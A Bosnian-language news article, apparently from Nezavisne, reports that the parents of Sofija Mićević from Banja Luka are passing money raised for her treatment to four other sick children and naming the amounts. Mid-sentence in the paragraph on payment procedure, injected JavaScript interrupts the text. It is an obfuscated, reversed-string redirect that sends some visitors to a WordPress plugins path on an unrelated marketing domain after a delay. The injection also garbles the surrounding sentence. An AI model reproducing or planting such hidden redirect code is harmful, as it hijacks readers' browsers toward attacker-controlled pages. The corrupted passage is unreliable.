Roditelji Sofije Mićević uplatili novac za liječenje četvoro mališana

Novac prikupljen u akciji za liječenje Sofije Mićević iz Banjaluke, koja je u aprilu izgubila životnu bitku, njeni roditelji su počeli preusmjeravati za pomoć drugoj djeci, te su ovih dana obezbijedili sredstva za liječenje četvoro oboljelih mališana.

Potvrdio je ovo za “Nezavisne” Vanja Mićević, otac Sofije, za koju je novac prvobitno prikupljen. “Onako kako smo obećali, počeli smo donirati novac djeci do 18 godina koja su na liječenju u inostranstvu pa smo 33.200 CHF proslijedili za liječenje djevojčice Elme Musinović iz Prnjavora, a za liječenje Dražene Stijepić iz Prijedora 76.300 evra”, rekao je Mićević. Pored toga su za kupovinu respiratornog aparata za bebu koja je odmah nakon rođenja prebačena u Beograd na intenzivnu njegu prebacili na račun 6.886 evra, dok su za dječaka Jovana Mišića iz Teslića za kupovinu “pacijent monitora” uplatili 8.190 KM.

“Nastavljamo dalje i još dvije akcije su najavljene, ali još čekamo potvrdu za njih. Važno je da djeca ne čekaju, a mi ćemo preostali novac dijeliti oboljeloj djeci do 18 godina koja se liječe u inostranstvu, sve dok se ne osnuje fond solidarnosti na koji će biti prebačen ostatak novca”, rekao je Mićević. Dodao je da ne zna koliko je tačno novca ostalo na računu, ali da će svaka marka biti preusmjerena za liječenje djece.

Dodao je da se novac ne uplaćuje na privatne račune već isključivo na račun firmi za medicinsku opremu ili bolnicama nakon predračtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}una, te da im se mogu javiti roditelj čija su djeca na liječenju. “U svemu nam pomažu volonteri koji su bili u akciji ‘Srcem za Sofiju’, ostali su uz nas i trude se da sredstva zajedno s nama podijele tamo gdje su najpotrebnija. Svoj djeci želimo brz oporavak i da uspiju u svojoj borbi”, kaže Mićević.

Nezavisne

Pogrebni prevoz Iris Lim Profi Prijedor Panta rhei Prijedor

You must be logged in to post a comment Login